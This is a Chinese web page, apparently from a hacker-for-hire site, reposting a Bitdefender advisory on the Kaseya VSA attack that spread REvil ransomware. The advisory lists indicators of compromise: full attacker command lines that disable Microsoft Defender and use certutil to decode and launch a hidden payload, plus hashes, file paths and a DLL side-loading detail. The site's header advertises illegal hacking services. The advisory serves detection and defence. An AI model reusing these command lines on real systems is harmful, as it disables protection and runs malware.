24小时黑客接单的网站

黑客业务,怎么找黑客,联系黑客,黑客服务,免费黑客服务QQ

2022年04月05日 11:49:00

Bitdefender安全通告:黑客使用Kaseya IT管理软件来分发REvil勒索病毒

2021 7月3日,美国东部时间上午10:00 IT管理软件厂商Kaseya紧急安全通知发布,Kaseya 的 VSA 产品正在使用复杂网络攻击的受害者Kaseya来分发REvil勒索病毒。

Kasaya安全通告:

                                                                                               “我们继续强烈建议本地客户 VSA 直到另行通知,服务器才关闭。我们还将保持 SaaS 服务器离线,直至另行通知。

我们的外部专家建议,遇到勒索软件并接收攻击者通信的客户不应点击任何链接——它们可以武器化。”

                                                                                               

公告原文:https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689

Bitdefender 正在积极监控和分析使用 Kaseya 发动高级攻击,Bitdefender到目前为止,调查结果表明,Bitdefender 解决方案可以检测和阻止攻击中使用的命令行操作和恶意交付payload,从而保护Bitdefender客户免受这种复杂的攻击。

因为这是一个不断变化的情况,我们将使用其他信息更新这篇文章。

Bitdefender 客户指南:

                   
  • Kaseya 安全公告要求其客户立即关闭当地 VSA 服务器。我们建议任何 Kaseya VSA 用户立即遵循此指南。
    •                
  • 在当地和混合环境中检查已知情况IoC指标 (IoC) - IoC 列表如下。
    •                
  • 美国网络安全和基础设施安全局(CISA) 已经发布了 警报,称他们正在监控 Kaseya VSA 和使用 VSA多个 软件MSP 攻击的详细信息。我们建议组织遵循 CISA 警报获得未来更新。

经过验证的IoC指标 :

1. 从 Kaseya 代理执行的命令行:

  • C:\Windows\system32\cmd.exe”/cping127.0.0.1-n5825>nul&C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSet-MpPreference-DisableRealtimeMonitoring$true-DisableIntrusionPreventionSystem$true-DisableIOAVProtection$true-DisableScriptScanning$true-EnableControlledFolderAccessDisabled-EnableNetworkProtectionAuditMode-Force-MAPSReportingDisabled-SubmitSamplesConsentNeverSend&copy/YC:\Windows\System32\certutil.exeC:\Windows\cert.exe&echo%RANDOM%>>C:\Windows\cert.exe&C:\Windows\cert.exe-decodec:\kworking\agent.crtc:\kworking\agent.exe&del/q/fc:\kworking\agent.crtC:\Windows\cert.exe&c:\kworking\agent.exe

  • C:\WINDOWS\system32\cmd.exe/cping127.0.0.1-n3637>nul&C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSet-MpPreference-DisableRealtimeMonitoring$true-DisableIntrusionPreventionSystem$true-DisableIOAVProtection$true-DisableScriptScanning$true-EnableControlledFolderAccessDisabled-EnableNetworkProtectionAuditMode-Force-MAPSReportingDisabled-SubmitSamplesConsentNeverSend&copy/YC:\Windows\System32\certutil.exeC:\Windows\cert.exe&echo%RANDOM%>>C:\Windows\cert.exe&C:\Windows\cert.exe-decodec:\WaRCoMWorking\agent.crtc:\WaRCoMWorking\agent.exe&del/q/fc:\WaRCoMWorking\agent.crtC:\Windows\cert.exe&c:\WaRCoMWorking\agent.exe

    • 2. 哈希:

                     
    • 561cffbaba71a6e8cc1cdceda990ead4,Bitdefender 2021年 5月 15日已检测到 Gen:Variant.Graftor.952042。这是使用 certutil.exe 加密的主要可执行文件 ( c:\kworking\agent.exe)
      •                
    • a47cf00aedf769d60d58bfe00c0b5421,Bitdefender 已于2021年5月13日检测到 Gen:Variant.Bulz.471680。这是由主可执行文件投递和使用 MS msmpeng.exe 在执行文件侧面加载 DLL。
      •                
    • 0293a5d21081a94a5589976b407f5675 – agent.crt 的哈希值(agent.exe 解密前的内容)。

    3. 文件路径:

                     
    • c:\WarCoMWorking\agent.crt
      •                
    • c:\WarCoMWorking\agent.exe
      •                
    • c:\kworking\agent.exe
      •                
    • c:\kworking\agent.crt

    c:\windows\msmpeng.exe(旧版容易受到 DLL 侧加载的影响)。本版主要由可执行文件投递,进一步用于加载 DLL (a47cf00aedf769d60d58bfe00c0b5421)。文件版本:MsMpEng.exe,Microsoft 恶意软件保护,4.5.0218.0

    正在使用Bitdefender EDR可用于客户IOC扫描功能,全网地毯式搜索IOC指标:

    添加黑名单规则:可在黑名单区域添加上述规则IOC全网阻断运行的哈希:

       

    标签:黑客 网络安全 网络攻击 

    作者:访客 , 分类:黑客业务 , 浏览:994 , 评论:1

    • 评论列表:
    •  野欢遐迩
       发布于 2022-06-16 18:04:56  回复该评论
    • Kaseya VSA 用户立即遵循此指南。                在当地和混合环境中检查已知情况IoC指标 (IoC) - IoC 列表如下。                美国网络安全和基础设施安全局(CISA) 已经发布了 警

    发表评论:

    Powered By

    Copyright Your WebSite.Some Rights Reserved.